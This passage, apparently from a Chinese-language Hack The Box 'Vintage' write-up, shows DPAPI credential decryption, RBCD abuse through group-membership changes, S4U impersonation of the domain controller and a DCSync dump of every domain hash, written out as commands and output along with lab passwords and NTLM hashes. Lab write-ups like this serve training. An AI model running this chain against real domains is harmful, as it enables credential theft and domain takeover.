00b0 81 FE CD CF 84 33 BE A2 87 B1 F2 11 6F 19 4A 27 .....3......o.J'
00c0 14 71 BB 4E 60 1E 27 8C 51 C9 34 2E 0E 15 ED 71 .q.N`.'.Q.4....q
00d0 5C 0B C3 CE 35 3E 0F CE 9B 50 9A 29 07 62 CC 90 \...5>...P.).b..
00e0 3C BA 0E 67 0D D1 36 9D 55 50 14 FB 02 79 94 D0 <..g..6.UP...y..
00f0 AC 21 EF 3F 65 7B 23 2A C2 6C EC 91 7A A1 79 90 .!.?e{#*.l..z.y.
KeyWord : Microsoft_WindowsLive:authstate:18
Data :
0000 6F A8 DC BC 86 05 99 B8 06 0F 53 67 7E A5 87 D3 o.........Sg~...
0010 F1 7A 9E 02 CA DC 23 44 A9 B1 3B 8F 8E D7 82 87 .z....#D..;.....
0020 EE 48 1F E5 92 79 9D 59 6A 73 10 D2 C5 ED 24 98 .H...y.Yjs....$.
0030 00 40 29 A9 7D 72 DD AA 8C 22 90 34 A4 2C D5 66 .@).}r...".4.,.f
0040 42 4C DF 10 01 D8 33 20 E9 42 4D 2C 6A 31 EE DF BL....3 .BM,j1..
0050 8C A0 07 AD 97 50 CA C1 15 9D 4B 85 0D F9 D5 7E .....P....K....~
0060 4E 95 CE 91 8A 84 2F 27 F5 BB 88 AA 0C 5A 72 F9 N...../'.....Zr.
0070 67 9B 68 8D C4 D7 B9 8C 6A 7C CE B5 2B 56 C5 1B g.h.....j|..+V..
0080 5C A1 44 84 B9 83 66 77 41 F0 9E D5 5C 59 42 C4 \.D...fwA...\YB.
0090 97 05 2A 64 C7 D6 AD FC D8 05 38 59 F9 F8 BB 39 ..*d......8Y...9
00a0 22 E9 1D 7E 87 8B 9D A1 D1 B4 10 95 A0 84 34 B5 "..~..........4.
00b0 03 2A 8B 6B 7F BD CD BA 6B A1 22 25 0B 27 61 82 .*.k....k."%.'a.
00c0 D1 0E 3E 05 5B 3E A8 C1 58 F0 CF B6 F0 92 6F FB ..>.[>..X.....o.
00d0 1F 3F D3 5B 9A BA A8 8C 4B 62 99 07 6C AA 65 B2 .?.[....Kb..l.e.
00e0 AE 9D 10 33 E2 0D 8F F7 63 FB A8 47 F5 38 51 C6 ...3....c..G.8Q.
00f0 66 0A 77 68 22 B4 3B 91 B2 A4 36 7E BA 4B 10 18 f.wh".;...6~.K..
KeyWord : Microsoft_WindowsLive:authstate:19
Data :
0000 4B 15 1A 3A FE 4D CE 1C FF 3C 84 E5 C1 A2 A3 ED K..:.M...<......
0010 7F DF 27 7E EA 7E 35 DB 90 65 CC 56 F7 EE BD 24 ..'~.~5..e.V...$
0020 D6 04 28 9B 39 78 0F DE 56 E8 4B 51 04 77 A0 A0 ..(.9x..V.KQ.w..
0030 10 D6 3A 76 91 99 CF B0 99 7A 12 2A 3F F3 A6 1D ..:v.....z.*?...
0040 CB A0 03 63 3E 82 7E 52 08 F3 AB 46 B4 32 35 C8 ...c>.~R...F.25.
0050 DA 68 0A A0 55 71 55 2A CE AA BF BD 7B 46 C9 79 .h..UqU*....{F.y
0060 45 56 1A 5F 96 97 FD A2 55 B7 BC 9F 2F 86 BC 5E EV._....U.../..^
0070 39 38 23 7C 07 38 97 01 4F A6 FD 5B DE BD A0 A2 98#|.8..O..[....
0080 BB 78 CE F0 14 27 83 24 6D AD 40 1A 37 52 EB 44 .x...'.$m.@.7R.D
0090 F2 AA 63 15 18 8E 87 73 FE DC 02 7C B2 77 03 6F ..c....s...|.w.o
00a0 F7 13 63 89 C9 0B C7 35 3F 1B FF 2F AB 70 61 D1 ..c....5?../.pa.
00b0 06 69 5E F5 0D D4 E5 35 CA 50 9F 66 CE 51 48 72 .i^....5.P.f.QHr
00c0 35 E8 89 CB 6D 37 27 32 16 03 F9 FF B4 B5 E1 C6 5...m7'2........
00d0 F9 0E 4D BD FC 1A A2 7A 23 7E 1E 49 FC 64 E4 9F ..M....z#~.I.d..
00e0 58 F7 47 8C FD B8 9A 3A 4E EE C0 7F 1E 5D F0 6D X.G....:N....].m
00f0 3D 5A 33 71 A5 44 A8 E7 8A BC 77 6A 5B FF C6 C7 =Z3q.D....wj[...
KeyWord : Microsoft_WindowsLive:authstate:20
Data :
0000 1C 2E 3A 14 1A CC 03 3A A9 39 1B 53 D3 CA 29 EF ..:....:.9.S..).
0010 48 70 22 44 64 0A FB EA CB 60 20 07 F0 50 87 42 Hp"Dd....` ..P.B
0020 37 EC 19 CD 3B 52 49 38 24 7F D3 DC A3 1D 5B 2F 7...;RI8$.....[/
0030 EA 94 9B 66 C5 6E F1 85 26 F9 9B 49 50 4E 74 10 ...f.n..&..IPNt.
0040 7F 50 19 6C 07 F7 26 B7 B2 EF EF 92 D8 A0 FC 55 .P.l..&........U
0050 91 8B DA 47 2A 8C 11 75 44 F6 B1 95 33 BE 52 F3 ...G*..uD...3.R.
0060 9D BB 04 E0 1E 5F AB 5A 96 FA FC D8 35 53 E4 9C ....._.Z....5S..
0070 DB 6E 58 EA FE C1 24 12 B3 45 20 05 39 C7 AA CA .nX...$..E .9...
0080 C1 98 73 2E 5E 42 39 AA AB 5F 92 7C D9 65 68 0F ..s.^B9.._.|.eh.
0090 91 43 76 2F 58 FE 1D F1 01 BC AA F2 57 A8 E7 56 .Cv/X.......W..V
00a0 62 7A FF 6F 4F DF E2 C3 2A A5 AD 31 A1 9A 7C 47 bz.oO...*..1..|G
00b0 D2 17 68 B7 B0 3B 38 F1 C0 1A 51 2F B0 36 58 12 ..h..;8...Q/.6X.
00c0 EB 39 F9 05 5E FC B8 FC D3 20 E4 96 55 B1 44 D2 .9..^.... ..U.D.
00d0 7A 11 CF F3 F5 B1 95 21 CD 3F 8F 24 EB 67 65 A0 z......!.?.$.ge.
00e0 1E FA 9A 86 0B 5D 49 1B 9C 5D 47 3D 0A B4 FC BF .....]I..]G=....
00f0 80 6C 9D 2E 92 AB E6 CE EC 40 FD 67 63 94 4B 2F .l.......@.gc.K/
KeyWord : Microsoft_WindowsLive:authstate:21
Data :
0000 C6 B6 80 38 80 FD 38 F2 96 78 79 1C E7 93 09 5D ...8..8..xy....]
0010 A5 F8 29 EA EA DA F3 A8 DD EB BF 81 B3 C4 2D D8 ..)...........-.
0020 34 9F DE 5C D7 ED 3D 07 C0 E7 EF 16 7A 56 42 7C 4..\..=.....zVB|
0030 D3 4A 44 04 65 93 99 09 A1 D0 82 DE BF 8B 43 61 .JD.e.........Ca
0040 1A DA 7B 1C 16 83 C0 3B 6A E6 D7 09 74 DF 29 CA ..{....;j...t.).
0050 DA 47 F6 01 C9 41 BD 71 B2 85 A1 C8 C3 3A 94 F4 .G...A.q.....:..
0060 87 3B 93 6E 26 7C A0 69 06 20 D7 4D C6 B1 5D 7A .;.n&|.i. .M..]z
0070 74 F6 77 66 36 FA E2 15 FE F9 F7 79 BB B1 29 20 t.wf6......y..)
0080 14 3A F0 45 0B 51 E2 5F 5E 03 5E 28 DC CC AD 3D .:.E.Q._^.^(...=
0090 84 1F 1B 26 D1 FD 2C 0D 62 6D CF C0 2E A9 26 95 ...&..,.bm....&.
00a0 53 B3 0C 30 74 94 F5 21 38 A3 8C 7C D3 75 FD AE S..0t..!8..|.u..
00b0 19 A7 86 66 08 24 2E 64 22 65 CD 3B 32 C0 15 9A ...f.$.d"e.;2...
00c0 AE 5F DA 20 8B 55 23 54 E3 D5 8D 54 3F B6 2B 38 ._. .U#T...T?.+8
00d0 8B F4 62 BB AE C0 E3 F5 44 9A BE A7 7E DE 2D F0 ..b.....D...~.-.
00e0 87 8A 8B 04 E7 B7 B0 DD DC 9B 91 F3 F6 A1 43 7D ..............C}
00f0 B9 F7 97 C1 A7 C4 47 A2 25 75 68 6E BF DE FE 8D ......G.%uhn....
KeyWord : Microsoft_WindowsLive:authstate:22
Data :
0000 CB B8 D1 CA AF 87 A0 F9 49 9E 61 96 8A 1F 1F CB ........I.a.....
0010 16 20 E3 0A 2E 39 0A EE 43 48 A8 DD B0 48 D6 CB . ...9..CH...H..
0020 2C 1C D1 03 46 30 6E FB A8 18 AC FA 9C 7C 8C 61 ,...F0n......|.a
0030 11 1F 8F 0E B4 79 83 1C 21 71 B4 E1 41 5C 85 D4 .....y..!q..A\..
0040 81 57 71 7B C6 CD 85 56 48 46 45 4B 40 FE 47 0A .Wq{...VHFEK@.G.
0050 C3 EA 4B 69 DD B6 02 0B AB 4D EB 43 61 DB EE BC ..Ki.....M.Ca...
0060 3A 22 07 B6 5E 42 06 05 D8 AB B7 41 E3 76 61 B9 :"..^B.....A.va.
0070 A9 0B 8B 9C A3 FA A1 0F 10 0A E7 55 3A 86 EB 78 ...........U:..x
0080 6E E7 12 00 F7 72 1A C7 F8 85 B5 20 F8 12 00 B5 n....r..... ....
0090 3F 2D C7 C7 19 81 37 E9 B3 A4 A2 83 E6 50 90 B2 ?-....7......P..
00a0 20 6D DD 1B CB 7A F8 85 CD 86 A4 67 31 79 20 85 m...z.....g1y .
00b0 57 D5 DF 2E 27 CB CC 7F 10 6C 82 65 38 AB 7C CB W...'....l.e8.|.
00c0 92 A3 19 D3 08 14 9F 10 B9 56 6D A8 AB 8A EB 2A .........Vm....*
00d0 39 AE 5A B4 2D AF A8 C2 92 82 39 3F E4 99 6A 74 9.Z.-.....9?..jt
00e0 48 A8 ED 32 83 C8 95 E2 B7 D8 9F 61 11 1A BF 17 H..2.......a....
00f0 F1 D7 0D 07 24 29 E7 47 60 9A 9C 23 80 95 97 4D ....$).G`..#...M
KeyWord : Microsoft_WindowsLive:authstate:23
Data :
0000 9E 45 D6 9B 0E 69 A9 68 F6 DA DD EB 4B D4 2C 10 .E...i.h....K.,.
0010 0B CD 99 7A 4D 78 D6 E0 07 39 8C 56 20 5D 28 60 ...zMx...9.V ](`
0020 0C BF 33 91 16 D9 0C 82 01 EE 44 D4 17 FF 14 EA ..3.......D.....
0030 DD 7F 3D 22 1D B3 AD 90 0E A6 18 33 50 E1 F5 61 ..=".......3P..a
0040 55 D5 C5 6C 0B 42 2C 0B 8A 25 3F 7C AF BD 16 47 U..l.B,..%?|...G
0050 08 DD D6 D5 F5 E7 7D 92 8E 3B C8 90 0C DF 4A 92 ......}..;....J.
0060 DA BD 9D 21 5B B6 8B 0F 2B B0 ED CC 4C C6 D2 14 ...![...+...L...
0070 6C EC 1A 6A 54 4B 79 1A 2A 1F 4E 4B 57 C1 76 05 l..jTKy.*.NKW.v.
0080 98 B5 A3 15 4D A6 C7 5D 50 B9 B9 F2 C3 16 E7 7D ....M..]P......}
0090 32 5A F3 C9 70 71 35 8C 15 9C 9E 8B 95 EE 55 2E 2Z..pq5.......U.
00a0 A9 32 AC F9 41 08 D0 10 34 2D 10 BA 20 8C 1F CE .2..A...4-.. ...
00b0 7D AF F2 41 C1 9D 11 C7 F8 4B 30 F8 E0 84 EE E8 }..A.....K0.....
00c0 37 D9 ED BE 0F 5D 90 01 83 86 A8 62 64 27 B2 A0 7....].....bd'..
00d0 AC F4 B5 2E B8 D7 C2 D3 4A 6F 50 63 2F 90 42 79 ........JoPc/.By
00e0 01 D2 29 74 A2 59 1A 96 55 93 A0 9B F3 E4 04 58 ..)t.Y..U......X
00f0 65 B7 18 C0 DF 56 97 CB 59 0C 74 BD 10 B4 EB 0C e....V..Y.t.....
KeyWord : Microsoft_WindowsLive:authstate:24
Data :
0000 FF B5 F3 48 E9 25 FC 39 5B CA BF F9 CB D0 D3 34 ...H.%.9[......4
0010 57 8A DA E9 53 CD 38 F3 20 27 B7 87 3A C0 AA CC W...S.8. '..:...
0020 61 8C 53 AB 2B 07 AE E9 19 C5 CA 35 0D 8E B6 9A a.S.+......5....
0030 CD E4 B2 D7 A5 F7 26 3E C4 E9 AE F0 76 49 F4 C7 ......&>....vI..
0040 EB 85 A0 FE 97 11 87 8C CF 7E 9F F0 C3 AF 3E DA .........~....>.
0050 D9 73 D8 97 33 E2 46 9B FD 93 5A AA 37 9C FE 92 .s..3.F...Z.7...
0060 2E 35 C9 9C 1B D4 96 19 1F 90 6B 44 1C E3 2E 18 .5........kD....
0070 B9 3C B2 94 C9 12 29 2B E9 1F EE 58 58 E6 93 BB .<....)+...XX...
0080 3E 23 D8 C4 36 CF 89 18 4D 03 97 6B 0A F0 EC EA >#..6...M..k....
0090 8A B6 DC 39 76 17 16 5F 9D 2F 9B 6E 87 5C 0A E9 ...9v.._./.n.\..
00a0 66 5F 65 76 A1 FE 8F 2D DC D9 A1 BD 73 13 C7 AD f_ev...-....s...
00b0 CE EA 5E 35 32 22 8E 65 65 93 9A C2 BD FF C0 A3 ..^52".ee.......
00c0 84 40 E3 6D E3 96 99 AA F6 23 78 15 1B A4 7D 9C .@.m.....#x...}.
00d0 BD 8A 62 87 7A 75 C9 6E 86 A0 D8 BA 3D DE 25 CF ..b.zu.n....=.%.
00e0 5E 7A 54 E5 48 91 99 98 2F 09 24 2C D3 29 30 A1 ^zT.H.../.$,.)0.
00f0 D6 35 5A 23 8E EE 6D AE 16 DE FE C6 07 34 92 AB .5Z#..m......4..
KeyWord : Microsoft_WindowsLive:authstate:25
Data :
0000 ED FE 0D 99 EF A6 72 C3 09 2A 84 99 BE 4C 2A 02 ......r..*...L*.
0010 1E AC 27 D1 7E C7 23 E9 BE AA C0 4B 90 E4 5B D3 ..'.~.#....K..[.
0020 31 8E C6 CB B6 E5 90 91 5C 77 06 15 D6 2E 2E 33 1.......\w.....3
0030 E9 C2 C1 51 16 8D 16 48 12 E7 C6 21 73 E2 42 54 ...Q...H...!s.BT
0040 8E 96 8E 51 9B 26 03 33 F2 1D 86 43 8A 1A 49 5A ...Q.&.3...C..IZ
0050 86 33 84 E3 F7 ED C6 7F 92 4E C7 09 82 01 7A 1E .3.......N....z.
0060 2B C9 88 52 14 27 80 6C 7C D9 F0 27 34 0D 78 55 +..R.'.l|..'4.xU
0070 55 44 0D 13 85 38 D6 2A 0D 25 57 9E F8 9A 43 DA UD...8.*.%W...C.
0080 C8 80 12 FD 94 1E 2D A9 07 70 A3 62 24 05 E5 01 ......-..p.b$...
0090 2C 8F BA AA AF BC C5 C8 9B 10 58 35 64 FD DB EC ,.........X5d...
00a0 93 64 3B 19 32 D0 FC CE 6B FE 6C 9C A5 44 B7 3F .d;.2...k.l..D.?
00b0 B5 0A 00 2E 2B D9 A1 4E 61 4F B2 79 56 06 0E 30 ....+..NaO.yV..0
00c0 86 05 67 37 37 E2 CE 36 6F DA D3 95 87 60 20 77 ..g77..6o....` w
00d0 F7 BE DA 57 50 89 5D DB 28 92 D6 CF 0A 51 AC EF ...WP.].(....Q..
00e0 DF 92 63 56 63 0B A1 B2 0B 3C 9B EF AA D5 5C FF ..cVc....<....\.
00f0 2E 18 31 3A D6 3B 4B 89 0E 1D EC 0F C6 DD 90 78 ..1:.;K........x
KeyWord : Microsoft_WindowsLive:authstate:26
Data :
0000 B6 45 42 FD 9B AD 0A 14 0F 3D C7 15 C2 2C 65 D0 .EB......=...,e.
0010 2E A6 6E 83 63 FC 93 10 83 97 9F 27 2C B5 50 70 ..n.c......',.Pp
0020 4D AA C5 3D 3A 61 15 6B DC 96 C4 42 7E 91 B0 C0 M..=:a.k...B~...
0030 CA 15 85 57 6F 97 56 12 A9 18 77 60 52 E4 4E BB ...Wo.V...w`R.N.
0040 EC FD 72 3D E5 00 94 A3 AB 9F 42 03 CC 4C 0C E7 ..r=......B..L..
0050 30 E5 F1 90 9E 0B 09 F6 2A 5A 7E E8 87 56 48 9E 0.......*Z~..VH.
0060 8C 4F 9E 5D A5 86 08 19 8F 65 15 F1 B7 12 AF 9A .O.].....e......
0070 96 03 49 D1 03 8B 5B 5D 5A 23 1A 20 C4 03 88 48 ..I...[]Z#. ...H
0080 64 04 D5 FA 4E 03 73 39 0A 11 94 F9 62 5F D4 A7 d...N.s9....b_..
0090 CA B5 C4 C3 BF 85 B7 F2 8B 65 C3 A2 A7 DD EA 48 .........e.....H
00a0 53 3C 24 67 7C 53 F3 E8 02 3D 7F 33 59 E6 AC 51 S<$g|S...=.3Y..Q
00b0 72 47 10 B7 8C F5 28 B3 EC C2 85 54 71 3B 0D E9 rG....(....Tq;..
00c0 41 6B 9E 4D D3 10 22 D4 CF 73 15 B7 69 35 4E A1 Ak.M.."..s..i5N.
00d0 AE A9 DF 0F 00 01 14 E6 F0 B1 39 10 EE 42 26 5B ..........9..B&[
00e0 B7 00 17 BE F6 D4 74 33 9F 95 29 DF 3D 7F 6F E0 ......t3..).=.o.
00f0 65 86 68 11 0D 37 77 73 1D BE 7D B6 D8 1D 1D 8B e.h..7ws..}.....
KeyWord : Microsoft_WindowsLive:authstate:27
Data :
0000 41 1C 52 F6 61 2E 15 6D 3E 1B 55 B0 04 0D 76 B9 A.R.a..m>.U...v.
0010 37 92 A5 E9 03 FC 0E E0 2B 0A 3C AB 3E BC BB 06 7.......+.<.>...
0020 26 98 36 51 21 22 14 89 7A D4 BD 82 34 20 B4 4A &.6Q!"..z...4 .J
0030 4D 37 9A 68 B2 1C 4E BA 72 37 50 77 B1 D3 DC BB M7.h..N.r7Pw....
0040 FC DF 46 67 8B 7D 55 DA A7 7F 40 8F DA DF FC 69 ..Fg.}U...@....i
0050 1C 8A 05 5B CF 81 C1 3D B4 12 AE D7 F9 27 C9 05 ...[...=.....'..
0060 23 91 F8 95 ED 06 49 2C 07 C0 73 10 62 C4 AD 72 #.....I,..s.b..r
0070 EF E0 17 1C CC 8D 42 38 06 0E 4C 16 33 BA 63 CE ......B8..L.3.c.
0080 81 AA A7 85 0F 57 2A 28 84 62 10 56 B3 D8 A0 56 .....W*(.b.V...V
0090 89 5E DE 8F A4 76 30 04 BF 82 85 4F 03 BA 09 8F .^...v0....O....
00a0 EF EF 40 57 68 BA 0A DF 5E A4 B1 B2 F8 9A 65 A5 ..@Wh...^.....e.
00b0 08 A3 F6 96 A7 92 D1 A6 98 E0 8C 54 60 5E 9F CB ...........T`^..
00c0 B0 DE B9 79 BF 4F 8D EA ED 50 70 FD 5E F9 2D 2E ...y.O...Pp.^.-.
00d0 1F 56 76 7D 5E DB 51 93 D2 B3 7B 29 6C 1D 03 8C .Vv}^.Q...{)l...
00e0 5C F5 46 A2 D7 23 5D CF 9F 0E F1 75 61 98 12 E6 \.F..#]....ua...
00f0 08 89 9B 60 CB C7 7A 22 36 88 E0 F2 C4 B0 6A 79 ...`..z"6.....jy
KeyWord : Microsoft_WindowsLive:authstate:28
Data :
0000 82 10 77 95 D6 46 6F B6 41 3B FE 68 24 48 11 AD ..w..Fo.A;.h$H..
0010 C0 F0 91 B5 8D 16 C0 2F AB DE 04 23 D5 69 66 BE ......./...#.if.
0020 F4 C8 FC 83 02 D3 58 8F 74 5D 2B 34 9D 09 76 CF ......X.t]+4..v.
0030 E7 A1 64 86 5C FE 8B B5 EF 97 E4 91 F5 F2 B3 A4 ..d.\...........
0040 70 39 FF C3 23 C2 60 DA F7 EF D6 3A 5F E9 FF 2A p9..#.`....:_..*
0050 42 63 FE AA 73 D6 57 6A AF 5E 4C 9C C1 BD 8F EB Bc..s.Wj.^L.....
0060 B9 72 3F CB 3F 22 E5 40 76 97 89 24 1E EE 25 B0 .r?.?".@v..$..%.
0070 66 F3 75 13 16 62 5B 01 50 9D 59 E3 48 7E 39 EB f.u..b[.P.Y.H~9.
0080 B1 F5 12 6F CE 49 84 36 BE B5 EF 87 19 46 1E 75 ...o.I.6.....F.u
0090 3B 4D 5D 4E F7 78 D8 0D 7A BE EF 5A 70 1D 3E FD ;M]N.x..z..Zp.>.
00a0 65 D3 A4 00 9A 5B 86 8C E7 2F C1 DC E5 5F 07 26 e....[.../..._.&
00b0 7C C9 B4 BF 5F A5 95 CE BB 1F BF 9C 21 D9 F9 D2 |..._.......!...
00c0 BD CC 6E 64 68 09 15 1D BA 1E E7 94 1C 01 7C 44 ..ndh.........|D
00d0 99 A0 D1 B4 BF E4 7A 54 99 98 F6 0D F9 19 DE 1F ......zT........
00e0 E5 39 B1 27 7C 16 09 E5 DA 29 EB 67 A1 E7 02 63 .9.'|....).g...c
00f0 28 E1 A3 15 04 3D 23 BA 65 C3 26 F0 B3 54 C7 3B (....=#.e.&..T.;
KeyWord : Microsoft_WindowsLive:authstate:29
Data :
0000 AC 33 51 95 30 59 99 92 D9 60 A3 DF BA D0 AD 98 .3Q.0Y...`......
0010 86 4F 16 7E E8 86 C1 87 6B 6D BC CF 6C 2C 93 BB .O.~....km..l,..
0020 FF 17 7D BE 3C 48 14 CF FA E3 67 55 EA D0 B4 EF ..}.<H....gU....
0030 39 86 21 B4 74 F3 43 72 DF B2 D1 76 44 50 D5 DA 9.!.t.Cr...vDP..
0040 56 8B A1 5E C3 31 FE A1 E4 12 B1 DF 13 06 EC 88 V..^.1..........
0050 39 1B 6B A6 ED A6 DB 27 67 1E 20 B0 97 3E 37 BA 9.k....'g. ..>7.
0060 9D FD A0 67 DF 4E 09 AE C8 61 26 B3 C9 27 68 58 ...g.N...a&..'hX
0070 7F 94 D4 E3 69 AF BD D7 A6 29 4A EA BB 26 7E E1 ....i....)J..&~.
0080 62 06 E4 33 95 A5 47 BF B5 5E 76 82 87 25 10 D3 b..3..G..^v..%..
0090 2C E9 D7 E2 E4 85 E1 2A 0B 3C 46 C2 E6 0F E3 9A ,......*.<F.....
00a0 1D F0 19 98 DE 60 65 E6 3A C6 7A 69 34 F8 67 79 .....`e.:.zi4.gy
00b0 49 84 40 10 6C 52 0F 66 CB 46 B5 CB A6 36 5E D5 I.@.lR.f.F...6^.
00c0 2D BF 71 9C 3A C1 81 74 76 3D 96 4C A6 87 2B DE -.q.:..tv=.L..+.
00d0 9B 7E 72 29 84 76 17 D7 A8 8E E1 7B D5 F2 0E 0D .~r).v.....{....
00e0 FD 06 80 72 41 8E 42 B1 CD 05 5D 6E F6 4E 0F 43 ...rA.B...]n.N.C
00f0 C1 6B 96 BC 60 50 E6 1A 53 69 E9 1D 9C C2 45 0A .k..`P..Si....E.
KeyWord : Microsoft_WindowsLive:authstate:30
Data :
0000 98 59 3B C1 24 12 D2 D5 F2 E4 F8 72 53 7F E7 A0 .Y;.$......rS...
0010 49 59 D2 02 17 14 CA 3A D3 AD 86 BB 9F F0 E5 78 IY.....:.......x
0020 08 30 D3 D6 8F 6B BE 5F 55 BC 2C A5 05 CE C0 4B .0...k._U.,....K
0030 4D BE 6E 59 A0 B9 E6 08 9D 2F 6A 1B 33 3A A2 E2 M.nY...../j.3:..
0040 71 C3 6E 03 3F AF 6E B2 86 E1 2E 99 2C BF 93 A1 q.n.?.n.....,...
0050 42 11 61 03 74 08 88 2E BF E7 C8 C2 66 EF EA 36 B.a.t.......f..6
0060 B4 A3 B4 91 D8 08 BF 0D 7A CD D8 6D 41 9B C7 65 ........z..mA..e
0070 13 4C 83 10 A8 4A E6 A6 25 DC 61 28 0D B0 B4 FE .L...J..%.a(....
0080 26 64 31 1D D6 37 CD D3 F6 9A 9D CD 2E 6E 02 E9 &d1..7.......n..
0090 E7 BD D2 59 12 A0 6A D9 44 74 D8 F5 78 7D 58 50 ...Y..j.Dt..x}XP
00a0 21 13 B6 8D 90 6C 31 52 9B 2A 91 C1 E3 0B 98 A3 !....l1R.*......
00b0 6B 4A 96 E4 09 31 4D 32 CD D6 16 87 4C E0 2A 47 kJ...1M2....L.*G
00c0 F1 D3 0B EF FA 5B 7C 2B 3F 1C 43 DC 73 EC 93 5A .....[|+?.C.s..Z
00d0 B2 A6 03 48 1B 9F 1C D6 96 CD 20 DC B6 3B AE 19 ...H...... ..;..
00e0 B8 B7 23 2C 6E 3A B6 C0 9F 9A D4 2C F9 EC 09 64 ..#,n:.....,...d
00f0 BE C1 40 00 00 00 2D 8C 40 D9 6F F4 D3 89 4E 64 ..@...-.@.o...Nd
KeyWord : Microsoft_WindowsLive:authstate:31
Data :
0000 87 CC 03 FF 0E 1F 59 6E 0D CD DF 1F 16 09 18 22 ......Yn......."
0010 00 A2 1F FC 8E F6 E9 99 98 5B EA CF 35 B2 48 E2 .........[..5.H.
0020 74 1F 38 D3 72 0A 23 24 50 02 05 B1 D1 11 3B C0 t.8.r.#$P.....;.
0030 1D CA 07 54 B1 98 ...T..
第二个有好东西
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2024-06-07 15:08:23
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000001 (CRED_TYPE_GENERIC)
Target : LegacyGeneric:target=admin_acc
Description :
Unknown :
Username : `vintage\c.neri_adm`
Unknown : `Uncr4ck4bl3P4ssW0rd0312`
这个大概率就是 c.neri_adm 用户的凭证
验证一下
bingo!
2.2. RBCD
然后在看下Dacl
jackpot!
我们利用 C.NERI_ADM 的 GenericWrite 权限把前面的计算机用户 fs01$ 加入到 DELEGATEDADMINS 组里面
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# bloodyAD --host 10.10.11.45 -d vintage.htb -k --dc-ip dc01.vintage.htb add groupMember DELEGATEDADMINS fs01$
[+] fs01$ added to DELEGATEDADMINS
此时 FS01$ 就被配置了对 DC01$ 的委派
然后重新申请一下 fs01$ 的票据
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# impacket-getTGT 'vintage.htb/fs01$:fs01' -dc-ip 10.10.11.45
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in fs01$.ccache
然后让 fs01$ 这个机器账户去“冒充” dc01$ 账户,并申请一个访问 cifs/DC01.vintage.htb 的服务票据 (TGS)
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# impacket-getST -spn 'cifs/DC01.vintage.htb' -impersonate 'dc01$' -dc-ip 10.10.11.45 'vintage.htb/fs01$:fs01'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating dc01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$@cifs_DC01.vintage.htb@VINTAGE.HTB.ccache
2.3. DCSync
然后利用这个服务票据进行 DCSync 攻击
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# export KRB5CCNAME=dc01\$@cifs_DC01.vintage.htb@VINTAGE.HTB.ccache
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# nxc smb dc01.vintage.htb -k --use-kcache --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] y
SMB dc01.vintage.htb 445 dc01 [*] x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.vintage.htb 445 dc01 [+] vintage.htb\dc01$ from ccache
SMB dc01.vintage.htb 445 dc01 [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB dc01.vintage.htb 445 dc01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB dc01.vintage.htb 445 dc01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
SMB dc01.vintage.htb 445 dc01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB dc01.vintage.htb 445 dc01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
SMB dc01.vintage.htb 445 dc01 M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
SMB dc01.vintage.htb 445 dc01 R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
SMB dc01.vintage.htb 445 dc01 L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
SMB dc01.vintage.htb 445 dc01 G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
SMB dc01.vintage.htb 445 dc01 C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
SMB dc01.vintage.htb 445 dc01 P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
SMB dc01.vintage.htb 445 dc01 svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
SMB dc01.vintage.htb 445 dc01 svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
SMB dc01.vintage.htb 445 dc01 svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
SMB dc01.vintage.htb 445 dc01 C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
SMB dc01.vintage.htb 445 dc01 L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:c09c04633d6d0a90d3ee2fd020be433a:::
SMB dc01.vintage.htb 445 dc01 DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
SMB dc01.vintage.htb 445 dc01 gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:587368d45a7559a1678b842c5c829fb3:::
SMB dc01.vintage.htb 445 dc01 FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
